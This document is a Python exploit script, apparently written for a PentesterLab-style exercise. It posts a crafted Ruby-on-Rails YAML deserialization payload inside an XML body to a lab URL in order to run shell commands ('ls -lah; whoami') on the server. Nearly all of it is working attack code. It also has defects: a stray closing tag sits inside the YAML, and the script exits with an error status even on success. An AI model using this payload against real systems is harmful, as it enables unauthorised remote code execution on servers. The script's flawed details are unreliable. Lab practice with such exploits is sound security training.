#!/usr/bin/python3
import requests
import html
import sys

url = "http://ptl-c255bc2a-ab90d9aa.libcurl.so/"
payload = "system('ls -lah; whoami')"

yaml = '''
--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? |
  foo
  ({}; @executed = true) unless @executed
  __END__
: !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format</exploit>
'''.format(payload)

xml = '''
<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">{}</exploit>
'''.format(html.escape(yaml))

header = {
    'Content-Type': 'text/xml',
    'X-HTTP-Method-Override': 'get'
}

resp = requests.post(url, data=xml, headers=header)
if resp.status_code == 200:
    print("Command sucessfully executed!")
    sys.exit(1)
else:
    print('Ouups something goes wrong!')
    print('Status code: {}'.format(resp.status_code))
    sys.exit(1)